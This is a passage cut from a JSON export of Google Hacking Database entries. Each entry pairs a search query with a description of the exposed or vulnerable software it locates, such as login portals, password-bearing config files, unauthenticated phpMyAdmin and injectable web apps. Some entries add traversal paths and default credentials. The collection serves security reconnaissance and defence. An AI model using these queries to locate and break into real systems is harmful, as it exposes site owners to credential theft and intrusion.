arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368" }, { "signatureReferenceNumber": "622", "link": "https://www.exploit-db.com/ghdb/622/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%22slxweb.dll%22+&btnG=Search", "shortDescription": "inurl:\"slxweb.dll\"", "textualDescription": "salesLogix is the Customer Relationship Management solution thatdrives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the server into authenticating a remote user as the CRM administrator without requiring a password. It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450" }, { "signatureReferenceNumber": "623", "link": "https://www.exploit-db.com/ghdb/623/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+DMXReady+Site+Chassis+Manager%22+-site%3Admxready.com&btnG=Google+Search", "shortDescription": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "textualDescription": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation." }, { "signatureReferenceNumber": "624", "link": "https://www.exploit-db.com/ghdb/624/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+My+Blog%22+intext%3A%22FuzzyMonkey.org%22&btnG=Search", "shortDescription": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "textualDescription": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325" }, { "signatureReferenceNumber": "625", "link": "https://www.exploit-db.com/ghdb/625/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Awiki%2FMediaWiki&btnG=Search", "shortDescription": "inurl:wiki/MediaWiki", "textualDescription": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7" }, { "signatureReferenceNumber": "626", "link": "https://www.exploit-db.com/ghdb/626/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22inurl%3A%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google+Search", "shortDescription": "\"inurl:/site/articles.asp?idcategory=\"", "textualDescription": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:" }, { "signatureReferenceNumber": "627", "link": "https://www.exploit-db.com/ghdb/627/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Enter+ip%22+inurl%3A%22php-ping.php%22&btnG=Search", "shortDescription": "\"Enter ip\" inurl:\"php-ping.php\"", "textualDescription": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg" }, { "signatureReferenceNumber": "628", "link": "https://www.exploit-db.com/ghdb/628/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22File+Upload+Manager+v1.3%22+%22rename+to%22&btnG=Search", "shortDescription": "\"File Upload Manager v1.3\" \"rename to\"", "textualDescription": "thepeak file upload manager let you manage your webtree with up and downloading files." }, { "signatureReferenceNumber": "629", "link": "https://www.exploit-db.com/ghdb/629/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Aclick.php+intext%3APHPClickLog+%0D%0A&btnG=Search", "shortDescription": "inurl:click.php intext:PHPClickLog", "textualDescription": "A script written in PHP 4 which logs a user's statistics when they click on a link. The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section." }, { "signatureReferenceNumber": "630", "link": "https://www.exploit-db.com/ghdb/630/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:welcome.to.horde&hl=en&lr=&filter=0", "shortDescription": "intitle:welcome.to.horde", "textualDescription": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus." }, { "signatureReferenceNumber": "631", "link": "https://www.exploit-db.com/ghdb/631/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22BlackBoard+1.5.1-f+%7C+%C2%A9+2003-4+by+Yves+Goergen%22&hl=en&lr=&filter=0", "shortDescription": "\"BlackBoard 1.5.1-f | \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-4 by Yves Goergen\"", "textualDescription": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well." }, { "signatureReferenceNumber": "632", "link": "https://www.exploit-db.com/ghdb/632/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22AppServ+Open+Project%22+-site%3Awww.appservnetwork.com&btnG=Search", "shortDescription": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "textualDescription": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages." }, { "signatureReferenceNumber": "633", "link": "https://www.exploit-db.com/ghdb/633/", "category": "Vulnerable Files", "querystring": "http://www.google.de/search?q=%22powered+by+YellDL%22", "shortDescription": "\"powered by YellDL\"", "textualDescription": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\"" }, { "signatureReferenceNumber": "634", "link": "https://www.exploit-db.com/ghdb/634/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=intitle%3A%22index+of%22+intext%3A%22content%2Eie5%22", "shortDescription": "intitle:\"index of\" intext:\"content.ie5\"", "textualDescription": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general." }, { "signatureReferenceNumber": "635", "link": "https://www.exploit-db.com/ghdb/635/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net", "shortDescription": "intitle:\"php icalendar administration\" -site:sourceforge.net", "textualDescription": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface." }, { "signatureReferenceNumber": "636", "link": "https://www.exploit-db.com/ghdb/636/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Web+Server+Statistics+for+****%22&btnG=Search", "shortDescription": "intitle:\"Web Server Statistics for ****\"", "textualDescription": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc." }, { "signatureReferenceNumber": "637", "link": "https://www.exploit-db.com/ghdb/637/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&&q=filetype%3Aphp+inurl%3Aindex+inurl%3Aphpicalendar+-site%3Asourceforge.net", "shortDescription": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "textualDescription": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars." }, { "signatureReferenceNumber": "638", "link": "https://www.exploit-db.com/ghdb/638/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net", "shortDescription": "intitle:\"php icalendar administration\" -site:sourceforge.net", "textualDescription": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones." }, { "signatureReferenceNumber": "639", "link": "https://www.exploit-db.com/ghdb/639/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22&start=0", "shortDescription": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "textualDescription": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search." }, { "signatureReferenceNumber": "640", "link": "https://www.exploit-db.com/ghdb/640/", "category": "Various Online Devices", "querystring": "http://www.google.nl/search?q=%22please+visit%22+intitle:%22i-Catcher+Console%22+Copyright+%22iCode+Systems%22&num=100&hl=nl&lr=&filter=0", "shortDescription": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "textualDescription": "CCTV webcams by ICode." }, { "signatureReferenceNumber": "641", "link": "https://www.exploit-db.com/ghdb/641/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=inurl%3Airc+filetype%3Acgi+cgi%3Airc", "shortDescription": "inurl:irc filetype:cgi cgi:irc", "textualDescription": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else." }, { "signatureReferenceNumber": "642", "link": "https://www.exploit-db.com/ghdb/642/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=natterchat+inurl%3Ahome.asp+-site%3Anatterchat.co.uk+&btnG=Search", "shortDescription": "natterchat inurl:home.asp -site:natterchat.co.uk", "textualDescription": "NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access..." }, { "signatureReferenceNumber": "643", "link": "https://www.exploit-db.com/ghdb/643/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype%3Ainf+inurl%3Acapolicy.inf&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox&rls=org.mozilla:en-US:official", "shortDescription": "filetype:inf inurl:capolicy.inf", "textualDescription": "The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy." }, { "signatureReferenceNumber": "644", "link": "https://www.exploit-db.com/ghdb/644/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=%22Certificate+Practice+Statement%22+inurl%3A%28PDF+%7C+DOC%29&btnG=Search", "shortDescription": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "textualDescription": "Certificate Practice Statement (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA." }, { "signatureReferenceNumber": "645", "link": "https://www.exploit-db.com/ghdb/645/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Acgi+inurl%3Acachemgr.cgi", "shortDescription": "filetype:cgi inurl:cachemgr.cgi", "textualDescription": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established." }, { "signatureReferenceNumber": "646", "link": "https://www.exploit-db.com/ghdb/646/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Achap-secrets+-cvs+&btnG=Suche&meta=", "shortDescription": "inurl:chap-secrets -cvs", "textualDescription": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext." }, { "signatureReferenceNumber": "647", "link": "https://www.exploit-db.com/ghdb/647/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Apap-secrets+-cvs+&btnG=Search", "shortDescription": "inurl:pap-secrets -cvs", "textualDescription": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext." }, { "signatureReferenceNumber": "648", "link": "https://www.exploit-db.com/ghdb/648/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?&q=filetype%3Aini+inurl%3A%22serv-u.ini%22", "shortDescription": "filetype:ini inurl:\"serv-u.ini\"", "textualDescription": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc." }, { "signatureReferenceNumber": "649", "link": "https://www.exploit-db.com/ghdb/649/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22forumdisplay.php%22+%2B%22Powered+by:+vBulletin+Version+3.0.0..4%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&start=80&sa=N", "shortDescription": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "textualDescription": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193" }, { "signatureReferenceNumber": "650", "link": "https://www.exploit-db.com/ghdb/650/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=WebControl+intitle%3A%22AMX+NetLinx%22&btnG=Search&hl=en&lr=&c2coff=1&client=firefox", "shortDescription": "WebControl intitle:\"AMX NetLinx\"", "textualDescription": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet." }, { "signatureReferenceNumber": "651", "link": "https://www.exploit-db.com/ghdb/651/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl%3AConnectComputer%2Fprecheck.htm+%7C+inurl%3ARemote%2Flogon.aspx", "shortDescription": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "textualDescription": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\"." }, { "signatureReferenceNumber": "652", "link": "https://www.exploit-db.com/ghdb/652/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aaol*%2F_do%2Frss_popup%3FblogID%3D&btnG=Search", "shortDescription": "inurl:aol*/_do/rss_popup?blogID=", "textualDescription": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email." }, { "signatureReferenceNumber": "653", "link": "https://www.exploit-db.com/ghdb/653/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%28inurl%3A%2Fshop.cgi%2Fpage%3D%29+%7C+%28inurl%3A%2Fshop.pl%2Fpage%3D%29&btnG=Search", "shortDescription": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "textualDescription": "This is a \"double dork\" finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal." }, { "signatureReferenceNumber": "654", "link": "https://www.exploit-db.com/ghdb/654/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:newsdesk.cgi%3F+inurl:%22t%3D%22&hl=en&lr=&ie=UTF-8&c2coff=1&client=firefox-a&start=10&sa=N", "shortDescription": "inurl:newsdesk.cgi? inurl:\"t=\"", "textualDescription": "Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely." }, { "signatureReferenceNumber": "655", "link": "https://www.exploit-db.com/ghdb/655/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Switch+to+table+format%22+inurl%3Atable%7Cplain&btnG=Search", "shortDescription": "\"Switch to table format\" inurl:table|plain", "textualDescription": "This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com" }, { "signatureReferenceNumber": "656", "link": "https://www.exploit-db.com/ghdb/656/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Home%22+%22Xerox+Corporation%22+%22Refresh+Status%22&btnG=Search", "shortDescription": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "textualDescription": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer." }, { "signatureReferenceNumber": "657", "link": "https://www.exploit-db.com/ghdb/657/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Awebutil.pl&btnG=Search", "shortDescription": "inurl:webutil.pl", "textualDescription": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime" }, { "signatureReferenceNumber": "658", "link": "https://www.exploit-db.com/ghdb/658/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=%22About+Mac+OS+Personal+Web+Sharing%22&hl=en&lr=&c2coff=1&client=firefox-a&filter=0", "shortDescription": "\"About Mac OS Personal Web Sharing\"", "textualDescription": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement." }, { "signatureReferenceNumber": "659", "link": "https://www.exploit-db.com/ghdb/659/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:conf+NoCatAuth+-cvs&hl=en&lr=&filter=0", "shortDescription": "ext:conf NoCatAuth -cvs", "textualDescription": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes." }, { "signatureReferenceNumber": "660", "link": "https://www.exploit-db.com/ghdb/660/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3A%22putty.reg%22&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:\"putty.reg\"", "textualDescription": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here." }, { "signatureReferenceNumber": "661", "link": "https://www.exploit-db.com/ghdb/661/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Icecast+Administration+Admin+Page%22&btnG=Search", "shortDescription": "intitle:\"Icecast Administration Admin Page\"", "textualDescription": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers." }, { "signatureReferenceNumber": "662", "link": "https://www.exploit-db.com/ghdb/662/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl%3A%2Fadm-cfgedit.php+&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", "shortDescription": "inurl:/adm-cfgedit.php", "textualDescription": "PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :(" }, { "signatureReferenceNumber": "663", "link": "https://www.exploit-db.com/ghdb/663/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%22liveice+configuration+file%22+ext:cfg+-site:sourceforge.net&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "textualDescription": "This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file." }, { "signatureReferenceNumber": "664", "link": "https://www.exploit-db.com/ghdb/664/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:portscan.php+%22from+Port%22%7C%22Port+Range%22&num=100&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "inurl:portscan.php \"from Port\"|\"Port Range\"", "textualDescription": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners." }, { "signatureReferenceNumber": "665", "link": "https://www.exploit-db.com/ghdb/665/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&c2coff=1&q=++intitle%3A%22sysinfo+*+%22+intext%3A%22Generated+by+Sysinfo+*+written+by+The+Gamblers.%22+&btnG=Search", "shortDescription": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "textualDescription": "Lots of information leakage on these pages about active network services, server info, network connections, etc.." }, { "signatureReferenceNumber": "666", "link": "https://www.exploit-db.com/ghdb/666/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Apst+pst+-from+-to+-date&btnG=Search", "shortDescription": "filetype:pst pst -from -to -date", "textualDescription": "Finds Outlook PST files which can contain emails, calendaring and address information." }, { "signatureReferenceNumber": "667", "link": "https://www.exploit-db.com/ghdb/667/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&q=intitle%3AConfiguration.File+inurl%3Asoftcart.exe&btnG=Google+Search", "shortDescription": "intitle:Configuration.File inurl:softcart.exe", "textualDescription": "This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths." }, { "signatureReferenceNumber": "668", "link": "https://www.exploit-db.com/ghdb/668/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Atechnote+inurl%3Amain.cgi*filename%3D*+&btnG=Google+Search", "shortDescription": "inurl:technote inurl:main.cgi*filename=*", "textualDescription": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter." }, { "signatureReferenceNumber": "669", "link": "https://www.exploit-db.com/ghdb/669/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext:%22Ready+with+10/100T+Ethernet%22&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intext:\"Ready with 10/100T Ethernet\"", "textualDescription": "Xerox 860 and 8200 Printers." }, { "signatureReferenceNumber": "670", "link": "https://www.exploit-db.com/ghdb/670/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext%3A%22UAA+%28MSB%29%22++Lexmark+-ext%3Apdf", "shortDescription": "intext:\"UAA (MSB)\" Lexmark -ext:pdf", "textualDescription": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)" }, { "signatureReferenceNumber": "671", "link": "https://www.exploit-db.com/ghdb/671/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Welcome+to+Your+New+Home+Page%21%22+%22by+the+Debian+release%22", "shortDescription": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "textualDescription": "This finds the default Apache page on Debian installs." }, { "signatureReferenceNumber": "672", "link": "https://www.exploit-db.com/ghdb/672/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%22intitle%3AIndex.Of+%2F%22+stats+merchant+cgi-*+etc", "shortDescription": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "textualDescription": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b." }, { "signatureReferenceNumber": "673", "link": "https://www.exploit-db.com/ghdb/673/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22running%3A+Nucleus+v3.1%22+-.nucleuscms.org+-demo", "shortDescription": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "textualDescription": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631" }, { "signatureReferenceNumber": "674", "link": "https://www.exploit-db.com/ghdb/674/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22intitle%3ACisco+Systems%2C+Inc.+VPN+3000+Concentrator%22&btnG=Search", "shortDescription": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "textualDescription": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator' is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator." }, { "signatureReferenceNumber": "675", "link": "https://www.exploit-db.com/ghdb/675/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22driven+by%3A+ASP+Message+Board%22", "shortDescription": "\"driven by: ASP Message Board\"", "textualDescription": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out." }, { "signatureReferenceNumber": "676", "link": "https://www.exploit-db.com/ghdb/676/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&safe=off&q=ext%3Aasp+inurl%3ADUgallery+intitle%3A%223.0%22+-site%3Adugallery.com+-site%3Aduware.com&btnG=Search", "shortDescription": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugallery.com -site:duware.com", "textualDescription": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html" }, { "signatureReferenceNumber": "677", "link": "https://www.exploit-db.com/ghdb/677/", "category": "Vulnerable Files", "querystring": 